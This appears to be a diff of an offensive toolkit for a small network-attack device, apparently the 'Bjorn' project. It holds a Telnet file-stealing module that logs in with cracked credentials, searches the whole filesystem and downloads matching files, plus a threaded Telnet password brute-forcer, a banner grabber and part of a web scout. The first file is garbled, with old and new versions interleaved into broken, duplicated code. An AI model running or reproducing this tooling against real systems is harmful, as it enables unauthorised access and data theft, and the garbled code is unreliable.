from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_telnet.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesTelnet"
b_class = "StealFilesTelnet"
b_module = "steal_files_telnet"
b_status = "steal_files_telnet"
b_parent = "TelnetBruteforce"
b_port = 23
b_port = 23
class StealFilesTelnet:
"""
Class to handle the process of stealing files from Telnet servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
logger.info("StealFilesTelnet initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.telnet_connected = False
self.stop_execution = False
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesTelnet initialized")
def connect_telnet(self, ip, username, password):
"""
Establish a Telnet connection.
"""
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
tn = telnetlib.Telnet(ip)
tn.read_until(b"login: ")
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds --------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password"
FROM creds
WHERE service='telnet'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
seen, out = set(), []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
# -------- Telnet helpers --------
def connect_telnet(self, ip: str, username: str, password: str) -> Optional[telnetlib.Telnet]:
try:
tn = telnetlib.Telnet(ip, b_port, timeout=10)
tn.read_until(b"login: ", timeout=5)
tn.write(username.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ")
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
tn.read_until(b"$", timeout=10)
logger.info(f"Connected to {ip} via Telnet with username {username}")
# prompt detection (naïf mais identique à l'original)
time.sleep(2)
self.telnet_connected = True
logger.info(f"Connected to {ip} via Telnet as {username}")
return tn
except Exception as e:
logger.error(f"Telnet connection error for {ip} with user '{username}' & password '{password}': {e}")
logger.error(f"Telnet connect error {ip} {username}: {e}")
return None
def find_files(self, tn, dir_path):
"""
Find files in the remote directory based on the config criteria.
"""
def find_files(self, tn: telnetlib.Telnet, dir_path: str) -> List[str]:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
tn.write(f'find {dir_path} -type f\n'.encode('ascii'))
files = tn.read_until(b"$", timeout=10).decode('ascii').splitlines()
matching_files = []
for file in files:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
out = tn.read_until(b"$", timeout=10).decode('ascii', errors='ignore')
files = out.splitlines()
matches = []
for f in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
matching_files.append(file.strip())
logger.info(f"Found {len(matching_files)} matching files in {dir_path}")
return matching_files
fname = os.path.basename(f.strip())
if (self.shared_data.steal_file_extensions and any(fname.endswith(ext) for ext in self.shared_data.steal_file_extensions)) or \
(self.shared_data.steal_file_names and any(sn in fname for sn in self.shared_data.steal_file_names)):
matches.append(f.strip())
logger.info(f"Found {len(matches)} matching files under {dir_path}")
return matches
except Exception as e:
logger.error(f"Error finding files on Telnet: {e}")
logger.error(f"Telnet find error: {e}")
return []
def steal_file(self, tn, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
def steal_file(self, tn: telnetlib.Telnet, remote_file: str, base_dir: str) -> None:
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("Steal interrupted.")
return
local_file_path = os.path.join(local_dir, os.path.relpath(remote_file, '/'))
local_file_dir = os.path.dirname(local_file_path)
os.makedirs(local_file_dir, exist_ok=True)
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
tn.write(f'cat {remote_file}\n'.encode('ascii'))
f.write(tn.read_until(b"$", timeout=10))
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
logger.success(f"Downloaded {remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"Error downloading file {remote_file} from Telnet: {e}")
logger.error(f"Telnet download error {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using Telnet.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesTelnet"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
# Get Telnet credentials from the cracked passwords file
telnetfile = self.shared_data.telnetfile
credentials = []
if os.path.exists(telnetfile):
with open(telnetfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no Telnet connection is established.
"""
if not self.telnet_connected:
logger.error(f"No Telnet connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
tn = self.connect_telnet(ip, username, password)
if tn:
remote_files = self.find_files(tn, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"telnet/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(tn, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
tn.close()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} Telnet credentials in DB for {ip}")
if not creds:
logger.error(f"No Telnet credentials for {ip}. Skipping.")
return 'failed'
def _timeout():
if not self.telnet_connected:
logger.error(f"No Telnet connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
base_dir = os.path.join(self.shared_data.data_stolen_dir, f"telnet/{mac}_{ip}")
success = False
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
tn = self.connect_telnet(ip, username, password)
if not tn:
continue
files = self.find_files(tn, '/')
if files:
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(tn, remote, base_dir)
logger.success(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
tn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"Telnet loot error {ip} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_telnet = StealFilesTelnet(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

View File

@@ -0,0 +1,288 @@
"""
telnet_bruteforce.py — Telnet bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles: (ip, port) par l’orchestrateur
- IP -> (MAC, hostname) via DB.hosts
- Succès -> DB.creds (service='telnet')
- Conserve la logique d’origine (telnetlib, queue/threads)
"""
import os
import telnetlib
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="telnet_bruteforce.py", level=logging.DEBUG)
b_class = "TelnetBruteforce"
b_module = "telnet_bruteforce"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
b_service = '["telnet"]'
b_trigger = 'on_any:["on_service:telnet","on_new_port:23"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes entre deux runs
b_rate_limit = '3/86400' # 3 fois par jour max
class TelnetBruteforce:
"""Wrapper orchestrateur -> TelnetConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_bruteforce = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""Lance le bruteforce Telnet pour (ip, port)."""
return self.telnet_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
logger.info(f"Executing TelnetBruteforce on {ip}:{port}")
self.shared_data.bjorn_orch_status = "TelnetBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""Gère les tentatives Telnet, persistance DB, mapping IPâ†(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- Telnet ----------
def telnet_connect(self, adresse_ip: str, user: str, password: str, port: int = 23, timeout: int = 10) -> bool:
timeout = int(getattr(self.shared_data, "telnet_connect_timeout_s", timeout))
try:
tn = telnetlib.Telnet(adresse_ip, port=port, timeout=timeout)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
try:
tn.close()
except Exception:
pass
if response[0] == 2 or response[0] == 3:
return True
except Exception:
pass
return False
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('telnet',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='telnet'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for Telnet bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
if self.telnet_connect(adresse_ip, user, password, port=port):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port)}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_telnet", 0) > 0:
time.sleep(self.shared_data.timewait_telnet)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"Telnet dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
for mac, ip, hostname, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="telnet",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=None,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=None
)
else:
logger.error(f"insert_cred failed for {ip} {user}: {e}")
self.results = []
def removeduplicates(self):
pass
if __name__ == "__main__":
try:
sd = SharedData()
telnet_bruteforce = TelnetBruteforce(sd)
logger.info("Telnet brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,206 +0,0 @@
"""
telnet_connector.py - This script performs a brute-force attack on Telnet servers using a list of credentials,
and logs the successful login attempts.
"""
import os
import pandas as pd
import telnetlib
import threading
import logging
import time
from queue import Queue
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="telnet_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "TelnetBruteforce"
b_module = "telnet_connector"
b_status = "brute_force_telnet"
b_port = 23
b_parent = None
class TelnetBruteforce:
"""
Class to handle the brute-force attack process for Telnet servers.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.telnet_connector = TelnetConnector(shared_data)
logger.info("TelnetConnector initialized.")
def bruteforce_telnet(self, ip, port):
"""
Perform brute-force attack on a Telnet server.
"""
return self.telnet_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute-force attack.
"""
self.shared_data.bjornorch_status = "TelnetBruteforce"
success, results = self.bruteforce_telnet(ip, port)
return 'success' if success else 'failed'
class TelnetConnector:
"""
Class to handle Telnet connections and credential testing.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.telnetfile = shared_data.telnetfile
# If the file does not exist, it will be created
if not os.path.exists(self.telnetfile):
logger.info(f"File {self.telnetfile} does not exist. Creating...")
with open(self.telnetfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for Telnet ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("23", na=False)]
def telnet_connect(self, adresse_ip, user, password):
"""
Establish a Telnet connection and try to log in with the provided credentials.
"""
try:
tn = telnetlib.Telnet(adresse_ip)
tn.read_until(b"login: ", timeout=5)
tn.write(user.encode('ascii') + b"\n")
if password:
tn.read_until(b"Password: ", timeout=5)
tn.write(password.encode('ascii') + b"\n")
# Wait to see if the login was successful
time.sleep(2)
response = tn.expect([b"Login incorrect", b"Password: ", b"$ ", b"# "], timeout=5)
tn.close()
# Check if the login was successful
if response[0] == 2 or response[0] == 3:
return True
except Exception as e:
pass
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.telnet_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing Telnet...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful login attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.telnetfile, index=False, mode='a', header=not os.path.exists(self.telnetfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results file.
"""
df = pd.read_csv(self.telnetfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.telnetfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
telnet_bruteforce = TelnetBruteforce(shared_data)
logger.info("Starting Telnet brute-force attack on port 23...")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute-force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing TelnetBruteforce on {ip}...")
telnet_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successes: {len(telnet_bruteforce.telnet_connector.results)}")
exit(len(telnet_bruteforce.telnet_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

191
actions/thor_hammer.py Normal file
View File

@@ -0,0 +1,191 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
thor_hammer.py — Service fingerprinting (Pi Zero friendly, orchestrator compatible).
What it does:
- For a given target (ip, port), tries a fast TCP connect + banner grab.
- Optionally stores a service fingerprint into DB.port_services via db.upsert_port_service.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
Notes:
- Avoids spawning nmap per-port (too heavy). If you want nmap, add a dedicated action.
"""
import logging
import socket
import time
from typing import Dict, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="thor_hammer.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ThorHammer"
b_module = "thor_hammer"
b_status = "ThorHammer"
b_port = None
b_parent = None
b_service = '["ssh","ftp","telnet","http","https","smb","mysql","postgres","mssql","rdp","vnc"]'
b_trigger = "on_port_change"
b_priority = 35
b_action = "normal"
b_cooldown = 1200
b_rate_limit = "24/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
def _guess_service_from_port(port: int) -> str:
mapping = {
21: "ftp",
22: "ssh",
23: "telnet",
25: "smtp",
53: "dns",
80: "http",
110: "pop3",
139: "netbios-ssn",
143: "imap",
443: "https",
445: "smb",
1433: "mssql",
3306: "mysql",
3389: "rdp",
5432: "postgres",
5900: "vnc",
8080: "http",
}
return mapping.get(int(port), "")
class ThorHammer:
def __init__(self, shared_data):
self.shared_data = shared_data
def _connect_and_banner(self, ip: str, port: int, timeout_s: float, max_bytes: int) -> Tuple[bool, str]:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout_s)
try:
if s.connect_ex((ip, int(port))) != 0:
return False, ""
try:
data = s.recv(max_bytes)
banner = (data or b"").decode("utf-8", errors="ignore").strip()
except Exception:
banner = ""
return True, banner
finally:
try:
s.close()
except Exception:
pass
def execute(self, ip, port, row, status_key) -> str:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
try:
port_i = int(port) if str(port).strip() else None
except Exception:
port_i = None
# If port is missing, try to infer from row 'Ports' and fingerprint a few.
ports_to_check = []
if port_i:
ports_to_check = [port_i]
else:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for p in ports_txt.split(";"):
p = p.strip()
if p.isdigit():
ports_to_check.append(int(p))
ports_to_check = ports_to_check[:12] # Pi Zero guard
if not ports_to_check:
return "failed"
timeout_s = float(getattr(self.shared_data, "thor_connect_timeout_s", 1.5))
max_bytes = int(getattr(self.shared_data, "thor_banner_max_bytes", 1024))
source = str(getattr(self.shared_data, "thor_source", "thor_hammer"))
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
self.shared_data.bjorn_orch_status = "ThorHammer"
self.shared_data.bjorn_status_text2 = ip
self.shared_data.comment_params = {"ip": ip, "port": str(ports_to_check[0])}
progress = ProgressTracker(self.shared_data, len(ports_to_check))
try:
any_open = False
for p in ports_to_check:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
ok, banner = self._connect_and_banner(ip, p, timeout_s=timeout_s, max_bytes=max_bytes)
any_open = any_open or ok
service = _guess_service_from_port(p)
product = ""
version = ""
fingerprint = banner[:200] if banner else ""
confidence = 0.4 if ok else 0.1
state = "open" if ok else "closed"
self.shared_data.comment_params = {
"ip": ip,
"port": str(p),
"open": str(int(ok)),
"svc": service or "?",
}
# Persist to DB if method exists.
try:
if hasattr(self.shared_data, "db") and hasattr(self.shared_data.db, "upsert_port_service"):
self.shared_data.db.upsert_port_service(
mac_address=mac or "",
ip=ip,
port=int(p),
protocol="tcp",
state=state,
service=service or None,
product=product or None,
version=version or None,
banner=banner or None,
fingerprint=fingerprint or None,
confidence=float(confidence),
source=source,
)
except Exception as e:
logger.error(f"DB upsert_port_service failed for {ip}:{p}: {e}")
progress.advance(1)
progress.set_complete()
return "success" if any_open else "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug/manual) --------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="ThorHammer (service fingerprint)")
parser.add_argument("--ip", required=True)
parser.add_argument("--port", default="22")
args = parser.parse_args()
sd = SharedData()
act = ThorHammer(sd)
row = {"MAC Address": sd.get_raspberry_mac() or "__GLOBAL__", "Hostname": "", "Ports": args.port}
print(act.execute(args.ip, args.port, row, "ThorHammer"))

396
actions/valkyrie_scout.py Normal file
View File

@@ -0,0 +1,396 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
valkyrie_scout.py — Web surface scout (Pi Zero friendly, orchestrator compatible).
What it does:
- Probes a small set of common web paths on a target (ip, port).
- Extracts high-signal indicators from responses (auth type, login form hints, missing security headers,
error/debug strings). No exploitation, no bruteforce.
- Writes results into DB table `webenum` (tool='valkyrie_scout') so the UI can browse findings.
- Updates EPD fields: bjorn_orch_status, bjorn_status_text2, comment_params, bjorn_progress.
"""
import json
import logging
import re
import ssl
import time
from http.client import HTTPConnection, HTTPSConnection, RemoteDisconnected
from typing import Dict, List, Optional, Tuple
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="valkyrie_scout.py", level=logging.DEBUG)
# -------------------- Action metadata (AST-friendly) --------------------
b_class = "ValkyrieScout"
b_module = "valkyrie_scout"
b_status = "ValkyrieScout"
b_port = 80
b_parent = None
b_service = '["http","https"]'
b_trigger = "on_web_service"
b_priority = 50
b_action = "normal"
b_cooldown = 1800
b_rate_limit = "8/86400"
b_enabled = 0 # keep disabled by default; enable via Actions UI/DB when ready.
# Small default list to keep the action cheap on Pi Zero.
DEFAULT_PATHS = [
"/",
"/robots.txt",
"/login",
"/signin",
"/auth",
"/admin",
"/administrator",
"/wp-login.php",
"/user/login",
]
# Keep patterns minimal and high-signal.
SQLI_ERRORS = [
"error in your sql syntax",
"mysql_fetch",
"unclosed quotation mark",
"ora-",
"postgresql",
"sqlite error",
]
LFI_HINTS = [
"include(",
"require(",
"include_once(",
"require_once(",
]
DEBUG_HINTS = [
"stack trace",
"traceback",
"exception",
"fatal error",
"notice:",
"warning:",
"debug",
]
def _scheme_for_port(port: int) -> str:
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
return "https" if int(port) in https_ports else "http"
def _first_hostname_from_row(row: Dict) -> str:
try:
hn = (row.get("Hostname") or row.get("hostname") or row.get("hostnames") or "").strip()
if ";" in hn:
hn = hn.split(";", 1)[0].strip()
return hn
except Exception:
return ""
def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
out = {}
for k, v in (headers or {}).items():
if not k:
continue
out[str(k).lower()] = str(v)
return out
def _detect_signals(status: int, headers: Dict[str, str], body_snippet: str) -> Dict[str, object]:
h = _lower_headers(headers)
www = h.get("www-authenticate", "")
set_cookie = h.get("set-cookie", "")
auth_type = None
if status == 401 and "basic" in www.lower():
auth_type = "basic"
